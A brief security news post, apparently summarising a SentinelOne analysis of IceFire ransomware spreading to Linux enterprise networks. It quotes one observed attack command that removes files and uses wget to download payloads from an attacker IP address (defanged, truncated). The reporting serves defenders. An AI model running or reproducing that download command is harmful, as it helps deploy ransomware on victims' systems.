Recently, security analysts at SentinelOne got to know about an infamous IceFire ransomware that has been found attacking both Windows and Linux enterprise networks.
An IceFire ransomware attack encrypts the files of the victim and demands payment in exchange for the key to decrypt them. This malware has been responsible for a great deal of damage, both to the personal computers of individuals and the computers of large organizations, since it was first discovered in 2020.
In recent weeks, hackers have been deploying the “IceFire” ransomware against Linux enterprise networks, a large shift from its previous usage against Windows-based networks. It is mainly launching these attacks against Linux networks connected to the Internet.
IceFire Ransomware Linux & Windows
According to the analysis, a 2.18 MB binary was compiled with gcc for AMD64 architecture, which is the IceFire Linux version:-
A sample of IceFire was tested on Ubuntu and Debian, two Intel-based distributions; both test systems successfully ran IceFire. A download of two payloads was performed using wget by the system, and they were saved to the:-
/opt/aspera/faspex:
sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redact ..
Support the originator by clicking the read the rest link below.